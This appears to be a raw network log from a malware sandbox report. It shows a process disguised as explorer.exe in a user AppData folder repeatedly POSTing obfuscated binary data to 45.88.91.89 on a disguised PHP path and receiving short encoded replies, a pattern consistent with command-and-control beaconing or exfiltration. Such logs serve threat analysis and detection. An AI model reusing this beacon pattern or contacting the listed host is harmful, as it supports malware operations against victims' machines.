                                                      Dec 13, 2024 14:33:08.027036905 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:08.375824928 CET2568OUTData Raw: 56 57 58 5b 56 5a 55 57 5b 5f 52 55 59 5b 57 53 57 5b 5f 5e 50 5c 56 52 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VWX[VZUW[_RUY[WSW[_^P\VR_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!9?#Z$>,<$',<'?$+3;* !3[1.=G3-=$[' \,.
                                                      Dec 13, 2024 14:33:09.118302107 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:09.357141972 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:08 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      24192.168.2.64985245.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:09.605530024 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:09.953927040 CET2568OUTData Raw: 56 53 5d 58 53 5e 50 54 5b 5f 52 55 59 5d 57 5c 57 5c 5f 58 50 5f 56 5a 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VS]XS^PT[_RUY]W\W\_XP_VZ_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX["9?+]$-'V< 0<0T0/++$3;5Y4T/X%%>/=$[' \,6
                                                      Dec 13, 2024 14:33:10.742171049 CET25INHTTP/1.1 100 Continue


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      25192.168.2.64985345.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:10.810444117 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1456
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:11.157072067 CET1456OUTData Raw: 56 55 58 5f 53 5e 50 54 5b 5f 52 55 59 51 57 5e 57 5a 5f 5d 50 5e 56 5a 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VUX_S^PT[_RUYQW^WZ_]P^VZ_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!^-/0#+<0',*7;[$9Z#71>0.+;=$[' \,
                                                      Dec 13, 2024 14:33:11.897660017 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:12.133444071 CET349INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:11 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 39 38 0d 0a 00 1a 24 07 3f 00 34 0b 32 2b 23 0c 24 13 0f 5a 2a 11 3a 06 2d 59 37 06 33 34 06 0e 28 20 26 57 2a 37 30 00 2a 1d 31 5a 34 2f 24 1f 39 36 2f 5f 0d 11 38 5e 23 3e 32 5b 2d 3d 33 10 2a 58 32 00 2b 01 13 58 3e 10 02 5c 30 5d 3a 11 31 2d 25 0f 28 00 2c 0f 3f 05 2f 02 39 05 21 1b 24 35 2f 57 0d 1e 24 09 28 0b 3e 01 37 3b 28 59 22 03 3a 03 3d 1a 2e 10 36 5f 2b 58 31 58 3a 06 25 12 38 1d 23 33 3c 5d 25 1d 20 0a 30 07 37 1e 32 3f 2e 50 2a 00 29 51 0f 32 54 54 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 98$?42+#$Z*:-Y734( &W*70*1Z4/$96/_8^#>2[-=3*X2+X>\0]:1-%(,?/9!$5/W$(>7;(Y":=.6_+X1X:%8#3<]% 072?.P*)Q2TT0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      26192.168.2.64985945.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:10.986248970 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:11.344594002 CET2568OUTData Raw: 53 55 58 5b 56 59 55 53 5b 5f 52 55 59 5b 57 5e 57 58 5f 5c 50 5c 56 58 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SUX[VYUS[_RUY[W^WX_\P\VX_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX["./+]'?/(%,W'/4?7 $!#!#Y&5B$ 8=$[' \,.
                                                      Dec 13, 2024 14:33:12.074239969 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:12.403295040 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:11 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      27192.168.2.64986245.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:12.664621115 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:33:13.016413927 CET2568OUTData Raw: 53 56 5d 5e 56 5c 55 51 5b 5f 52 55 59 5a 57 5c 57 53 5f 59 50 5b 56 5b 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SV]^V\UQ[_RUYZW\WS_YP[V[_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!_.3^3-;W? Y0,W07+470]%Y#T(%X5G0>?-=$[' \,*
                                                      Dec 13, 2024 14:33:13.751754045 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:13.985359907 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:13 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      28192.168.2.64986845.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:14.228312016 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:14.579169989 CET2568OUTData Raw: 56 57 5d 52 56 5e 50 55 5b 5f 52 55 59 5e 57 5e 57 53 5f 59 50 5b 56 5c 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VW]RV^PU[_RUY^W^WS_YP[V\_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[":<\0;V<<$X3$T'Z7Y?7?3(=X4+&2%>',-$[' \,
                                                      Dec 13, 2024 14:33:15.313951015 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:15.581617117 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:15 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      29192.168.2.64987445.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:15.829936981 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:16.188282967 CET2568OUTData Raw: 56 57 58 5c 56 5c 55 52 5b 5f 52 55 59 5e 57 5f 57 53 5f 53 50 5e 56 5d 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VWX\V\UR[_RUY^W_WS_SP^V]_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!9/00>?'30$Z#^(7;Y$+X41#26$>/=$[' \,
                                                      Dec 13, 2024 14:33:16.916068077 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:17.153258085 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:16 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      30192.168.2.64987545.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:17.263113022 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1456
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:17.610434055 CET1456OUTData Raw: 56 5b 5d 5a 56 5d 50 50 5b 5f 52 55 59 5d 57 5a 57 52 5f 59 50 52 56 53 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: V[]ZV]PP[_RUY]WZWR_YPRVS_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX["-/0&./<,$?0W$ (;$-4#$>'.,[8-$[' \,6
                                                      Dec 13, 2024 14:33:18.351968050 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:18.585073948 CET349INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:18 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 39 38 0d 0a 00 1a 24 07 28 17 05 56 27 3b 33 09 27 2e 3d 11 2a 2f 08 00 2e 2c 3c 10 33 1d 23 1c 3c 33 2a 50 3e 0a 33 59 2a 33 3e 03 23 11 3c 55 2c 36 2f 5f 0d 11 3b 06 20 07 26 5a 2f 2e 28 03 3e 3d 35 5f 2b 2c 25 1c 29 2d 34 5d 27 05 00 1e 31 2e 2e 50 28 2a 2b 1e 2b 3b 20 17 2c 2c 36 06 26 35 2f 57 0d 1e 24 0c 3c 32 35 1d 34 3b 27 07 22 3e 21 5b 2a 1a 3d 0f 36 07 0d 11 27 2e 0b 5d 31 02 2c 10 23 23 06 58 27 23 2b 52 24 07 05 54 24 3f 2e 50 2a 00 29 51 0f 32 54 54 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 98$(V';3'.=*/.,<3#<3*P>3Y*3>#<U,6/_; &Z/.(>=5_+,%)-4]'1..P(*++; ,,6&5/W$<254;'">![*=6'.]1,##X'#+R$T$?.P*)Q2TT0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      31192.168.2.64987645.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:17.392546892 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:17.750782967 CET2568OUTData Raw: 56 5a 5d 5a 56 54 50 57 5b 5f 52 55 59 5b 57 5f 57 5b 5f 53 50 5d 56 5d 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VZ]ZVTPW[_RUY[W_W[_SP]V]_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!\,,?'0(40 S$/'\+B($+5 7Z&X9A$>0;=$[' \,.
                                                      Dec 13, 2024 14:33:18.476558924 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:18.709062099 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:18 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      32192.168.2.64988245.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:18.951000929 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:33:19.297868967 CET2568OUTData Raw: 53 56 58 5b 56 55 55 54 5b 5f 52 55 59 51 57 5b 57 5c 5f 5c 50 5e 56 5c 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SVX[VUUT[_RUYQW[W\_\P^V\_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!_.Z4$$<?'0/+$,+X?$3(%Z#!?Z210.0^--$[' \,
                                                      Dec 13, 2024 14:33:20.045212030 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:20.318013906 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:19 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      33192.168.2.64988645.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:20.555969000 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:20.909411907 CET2568OUTData Raw: 53 57 58 58 53 59 55 56 5b 5f 52 55 59 5e 57 5b 57 58 5f 5e 50 5b 56 52 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SWXXSYUV[_RUY^W[WX_^P[VR_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!,,\&>?<%/,T%<^*$^&(& T(2X%A3+,$[' \,
                                                      Dec 13, 2024 14:33:21.642539978 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:21.881769896 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:21 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      34192.168.2.64988945.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:22.142391920 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2564
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:22.500850916 CET2564OUTData Raw: 56 52 5d 5a 53 59 55 53 5b 5f 52 55 59 59 57 5d 57 5a 5f 52 50 59 56 5c 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VR]ZSYUS[_RUYYW]WZ_RPYV\_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!:73> ?3$R$?'Y($;[$8&"",&.A3=/;$[' \,>
                                                      Dec 13, 2024 14:33:23.227137089 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:23.460975885 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:23 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      35192.168.2.64989445.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:23.776990891 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1456
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      36192.168.2.64989545.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:24.171540022 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:24.516482115 CET2568OUTData Raw: 56 5b 5d 5f 53 5b 55 5e 5b 5f 52 55 59 58 57 53 57 5d 5f 52 50 58 56 5b 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: V[]_S[U^[_RUYXWSW]_RPXV[_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!_9,#['.'V+, Z'?/'<'\+?3(!^#T,%-=F$(Z8$[' \,"
                                                      Dec 13, 2024 14:33:25.269495964 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:25.505440950 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:25 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
